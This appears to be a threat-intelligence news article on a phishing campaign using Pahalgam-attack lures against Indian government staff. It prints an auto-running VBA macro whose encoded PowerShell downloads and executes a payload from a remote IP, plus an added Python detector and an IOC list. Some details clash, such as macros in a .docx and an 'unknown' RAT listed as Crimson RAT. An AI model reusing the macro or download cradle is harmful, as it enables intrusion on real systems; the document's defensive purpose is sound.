Pahalgam Attack Lure Used in Cyberattacks Against Indian Government


In a targeted cyber espionage campaign, attackers are using fake documents referencing the recent Pahalgam attack to go after Indian government personnel. Discovered in early May 2025, the campaign relies on spear-phishing emails with attachments meant to exploit officials’ interest in the ongoing security situation.

These emails are crafted to appear as if they come from legitimate government sources, making them more convincing. The attached Word documents contain embedded macros that, once enabled, trigger a multi-stage malware infection.

The malicious documents are disguised as official briefings or intelligence reports about the Pahalgam incident. They prompt recipients to “Enable Content” to view the file, which silently activates hidden malware.

The attackers designed these files with realistic letterheads and formatting to mimic genuine government communications. Seqrite researchers discovered the campaign after noticing unusual network traffic from government systems.

Their analysis revealed a previously unknown Remote Access Trojan (RAT) that stays hidden on infected devices and connects to servers linked to a known nation-state group that has targeted Indian government agencies in the past.

Experts believe this is a highly targeted and sophisticated operation, aimed at collecting sensitive information from defense, intelligence, and law enforcement networks. The campaign’s timing—right after the Pahalgam attack—shows the attackers are using current events to increase their success.

All about the attack

The attack starts when victims open a file named “Pahalgam_Incident_Report_Confidential.docx”. If they enable macros, hidden VBA code runs a PowerShell command to launch the malware.

' Macro as shown in the article: runs automatically when the document opens
Sub AutoOpen()
    Dim str As String
    ' -nop: no profile, -w hidden: no visible window, -e: base64-encoded command
    str = "powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM="
    ' Launch PowerShell with the window hidden from the user
    Shell str, vbHide
End Sub

The PowerShell command downloads more malware hidden in a fake PNG file. It sets up persistence using scheduled tasks and Registry changes, then gathers system info, steals data, and tries to spread across government networks.
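To show how a defender can pick this launch chain out of process-creation telemetry, here is an added Python example (not code from the article or from Seqrite). It assumes hypothetical Sysmon-style "ParentImage=... CommandLine=..." log lines, decodes the -e argument (PowerShell expects UTF-16LE, but the macro's sample is plain ASCII base64, so it falls back), and scores the Office-parent, hidden-window, encoded-command and download-cradle signals together.

```python
import base64
import re

# Constructed sample events (hypothetical Sysmon/4688-style "key=value" lines).
# The first carries the exact command line built by the macro in the article;
# the second is benign scheduled admin activity.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE "
    "CommandLine=powershell.exe -nop -w hidden -e "
    "JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM=",
    "ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
]

ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/]+=*)", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
CRADLE_TOKENS = ("downloadstring", "downloadfile", "webclient", "invoke-expression", "iex ")

def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand payload. Real PowerShell expects UTF-16LE; the
    article's sample is plain ASCII base64. UTF-16LE ASCII text always has a
    NUL in every odd byte, which is how the two cases are told apart."""
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")

def analyse_event(line: str) -> dict:
    """Return the decoded script (if any) and the reasons the event resembles
    the macro-launched download cradle described in the article."""
    m = re.match(r"ParentImage=(.*?)\s+CommandLine=(.*)$", line)
    parent, cmd = (m.group(1), m.group(2)) if m else ("", line)
    reasons = []
    if parent.lower().endswith(OFFICE_PARENTS):
        reasons.append("powershell spawned by an Office application")
    if HIDDEN_FLAG.search(cmd):
        reasons.append("hidden window requested")
    decoded = ""
    enc = ENC_FLAG.search(cmd)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
        reasons.append("encoded command")
        if any(t in decoded.lower() for t in CRADLE_TOKENS):
            reasons.append("download-and-execute cradle in decoded script")
    # Two or more independent signals is the alert threshold used here
    return {"decoded": decoded, "reasons": reasons, "suspicious": len(reasons) >= 2}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyse_event(ev)
        print("SUSPICIOUS" if r["suspicious"] else "ok", r["reasons"], r["decoded"])
```

The decoded script for the first event is the cradle the article describes: a WebClient download of c.png followed by iex, which is why a rule keyed on the decoded text rather than the raw command line catches it.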

Indicators of Compromise (IOCs)

Category | Indicator
--- | ---
Phishing Documents | c4fb60217e3d43eac92074c45228506a, 172fff2634545cf59d59c179d139e0aa (examples)
Phishing Domains | jkpolice[.]gov[.]in[.]kashmirattack[.]exposed, iaf[.]nic[.]in[.]ministryofdefenceindia[.]org
Phishing URLs | hxxps://jkpolice[.]gov[.]in[.]kashmirattack[.]exposed/service/home/ (example)
PPAM/XLAM | d946e3e94fec670f9e47aca186ecaabe (example)
Crimson RAT | 026e8e7acb2f2a156f8afff64fd54066 (example), IP: 93.127.133.58 (Ports: 1097, etc.)

About the Author:

FirstHackersNews- Identifies Security
